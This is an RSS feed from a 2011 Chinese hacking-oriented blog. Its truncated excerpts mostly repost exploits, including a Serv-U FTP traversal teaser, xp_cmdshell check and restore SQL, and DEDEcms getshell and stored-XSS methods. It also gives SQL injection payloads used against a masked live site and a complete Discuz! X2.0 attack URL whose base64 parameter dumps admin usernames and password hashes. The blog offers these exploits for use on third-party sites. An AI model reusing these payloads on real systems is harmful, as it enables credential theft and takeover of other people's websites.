<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>F4usT's BloG</title><link>http://www.f4le.com/</link><description>F4usT|关注网页设计，关注脚本语言，关注delphi的博客.</description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>Copyright F4usT's BloG Your WebSite. Some Rights Reserved.  Archiver  </copyright><pubDate>Sat, 17 Dec 2011 15:42:01 +0800</pubDate><item><title>Serv-U FTP Jail Break（越权遍历目录、下载任意文件）</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/87.html</link><pubDate>Fri, 02 Dec 2011 10:23:43 +0800</pubDate><guid>http://www.f4le.com/post/87.html</guid><description><![CDATA[<p><br />[*]----------------------------------------------------[*]<br />Serv-U FTP Server Jail Break 0day<br />Discovered By Kingcope<br />Year 2011<br />[*]----------------------------------------------------[*]</p><p>/*<br />通过构造..:/来遍历服务器目录，下载任意文件<br />...</p>]]></description><category>漏洞收藏</category><comments>http://www.f4le.com/post/87.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=87</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=87&amp;key=864d98ed</trackback:ping></item><item><title>如何判段删掉，恢复 xp_cmdshell</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/86.html</link><pubDate>Wed, 23 Nov 2011 10:55:34 +0800</pubDate><guid>http://www.f4le.com/post/86.html</guid><description><![CDATA[<p>一、xp_cmdshell的删除及恢复</p><p>1、判断xp_cmdshell是否存在</p><p>(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')</p><p>返回结果为1就ok</p><p>2、恢复xp_cmdshell的方法</p><p>删除扩展存储过过程xp_cmdshell的语句</p><p>exec sp_dropextendedproc 'xp_cmdshell'</p>...]]></description><category>技术文摘</category><comments>http://www.f4le.com/post/86.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=86</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=86&amp;key=f85c4128</trackback:ping></item><item><title>窝窝团，尼玛的，坑爹呢。</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/wwt.html</link><pubDate>Thu, 29 Sep 2011 09:01:35 +0800</pubDate><guid>http://www.f4le.com/post/wwt.html</guid><description><![CDATA[<p><a target="_blank" href="http://f4le.com/wwt.html"><span style="font-size: medium"><span style="color: #ff0000">窝窝团</span></span></a><span style="font-size: medium"><span style="color: #ff0000">，尼玛的，坑爹啊</span></span></p><p><img alt="" src="http://www.f4le.com/upload/201109290905112025.jpg" /></p>...]]></description><category>个人随笔</category><comments>http://www.f4le.com/post/wwt.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=85</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=85&amp;key=81b3b4d6</trackback:ping></item><item><title>80After CMS V4 鸡肋上传漏洞 - 脚本漏洞</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/83.html</link><pubDate>Thu, 18 Aug 2011 16:20:29 +0800</pubDate><guid>http://www.f4le.com/post/83.html</guid><description><![CDATA[<p>By：<strong>小A</strong></p><p>&nbsp;&nbsp;&nbsp; 官方网址:http://www.reaft.com/</p><p>&nbsp;&nbsp;&nbsp; Cms下载地址:http://www.reaft.com/html/1/200.html</p><p>&nbsp;&nbsp;&nbsp; 界面做的还不错，搜索了一下好像用的人很少，开始。</p><p>&nbsp;&nbsp;&nbsp; 首先看目录下 UpLoad.html 文件上传，调用了的是 UpLoad.asp。</p><p>...</p>]]></description><category>网络转载</category><comments>http://www.f4le.com/post/83.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=83</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=83&amp;key=e7996c72</trackback:ping></item><item><title>DEDEcms 拿shell EXP</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/dede.html</link><pubDate>Thu, 11 Aug 2011 11:45:27 +0800</pubDate><guid>http://www.f4le.com/post/dede.html</guid><description><![CDATA[<p><table cellspacing="0" cellpadding="0">    <tbody>        <tr>            <td class="t_msgfont" id="postmessage_248793">            <p>漏洞细节已经传遍了（<a href="http://www.t00ls.net/thread-17354-1-1.html" target="_blank">http://www.t00ls.net/thread-17354-1-1.html</a>），又没得玩了。<font style="font-size: 0px; color: #fff">T00LS7 @! ~&quot; `, T( g2 ^5 T+ d</font><br />...</p></p></td></tr></tbody></table>]]></description><category>漏洞收藏</category><comments>http://www.f4le.com/post/dede.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=82</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=82&amp;key=7fa80af5</trackback:ping></item><item><title>栾川之行。</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/81.html</link><pubDate>Wed, 03 Aug 2011 09:01:50 +0800</pubDate><guid>http://www.f4le.com/post/81.html</guid><description><![CDATA[<p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,520)" src="http://www.f4le.com/upload/201108030902334835.jpg" /></p><p>&nbsp;</p><p>&nbsp;</p><p><img title="" alt="" onload="ResizeImage(this,520)" src="http://www.f4le.com/upload/201108030902497372.jpg" /></p>...]]></description><category>个人随笔</category><comments>http://www.f4le.com/post/81.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=81</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=81&amp;key=edf2fee5</trackback:ping></item><item><title>搜索型字符注入</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/80.html</link><pubDate>Mon, 18 Jul 2011 15:46:42 +0800</pubDate><guid>http://www.f4le.com/post/80.html</guid><description><![CDATA[<p>SQL注入：http://www.*****.cn/ZW_index.aspx&nbsp; <br />搜索注入<br />1、基本信息<br />数据库版本：<br />2011%' and 1=(select @@version) and '%'=''<br />数据库连接用户：<br />2011%' and user&gt;0 and '%'='&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p><p>...</p>]]></description><category>技术文摘</category><comments>http://www.f4le.com/post/80.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=80</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=80&amp;key=7ca39251</trackback:ping></item><item><title>安全性异常 ,请求类型的权限已失败。</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/79.html</link><pubDate>Mon, 18 Jul 2011 15:38:54 +0800</pubDate><guid>http://www.f4le.com/post/79.html</guid><description><![CDATA[<p>安全性异常 <br />说明: 应用程序试图执行安全策略不允许的操作。要授予此应用程序所需的权限，请与系统管理员联系，或在配置文件中更改该应用程序的信任级别。</p><p>异常详细信息: System.Security.SecurityException: 请求&ldquo;System.Security.Permissions.SecurityPermission, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089&rdquo;类型的权限已失败。</p>...]]></description><category>学习笔记</category><comments>http://www.f4le.com/post/79.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=79</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=79&amp;key=cfe350de</trackback:ping></item><item><title>Dz x 2.0 SqL 注射0day</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/78.html</link><pubDate>Wed, 29 Jun 2011 14:48:21 +0800</pubDate><guid>http://www.f4le.com/post/78.html</guid><description><![CDATA[<p>转自互联网 如果谁是首发 麻烦给我说下 我会加上版权 联系邮箱：<a href="mailto:admin@f4le.com">admin@f4le.com</a></p><p>DZ2.0直接暴管理账号密码 <br /><a href="http://XXXXXXXX/forum.php?mod=attachment&amp;findpost=ss&amp;aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D">http://XXXXXXXX/forum.php?mod=attachment&amp;findpost=ss&amp;aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D</a></p>...]]></description><category>漏洞收藏</category><comments>http://www.f4le.com/post/78.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=78</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=78&amp;key=a425a06c</trackback:ping></item><item><title>dedecms xss oday通杀所有版本</title><author>null@null.com (admin)</author><link>http://www.f4le.com/post/77.html</link><pubDate>Sat, 25 Jun 2011 19:29:09 +0800</pubDate><guid>http://www.f4le.com/post/77.html</guid><description><![CDATA[<p>&nbsp;</p><div>作者：haris<br /><br />漏洞原因：由于编辑器过滤不严，将导致恶意脚本运行。可getshell<br /><br />为什么说它是ODay呢，能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)<br />目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。<br /><br />下面说说利用方法。<br />条件有2个：<br />1.开启注册<br />2.开启投稿<br /><br />注册会员----发表文章<br />...</div>]]></description><category>网络转载</category><comments>http://www.f4le.com/post/77.html#comment</comments><wfw:comment>http://www.f4le.com/</wfw:comment><wfw:commentRss>http://www.f4le.com/feed.asp?cmt=77</wfw:commentRss><trackback:ping>http://www.f4le.com/cmd.asp?act=tb&amp;id=77&amp;key=c5ad1afb</trackback:ping></item></channel></rss>

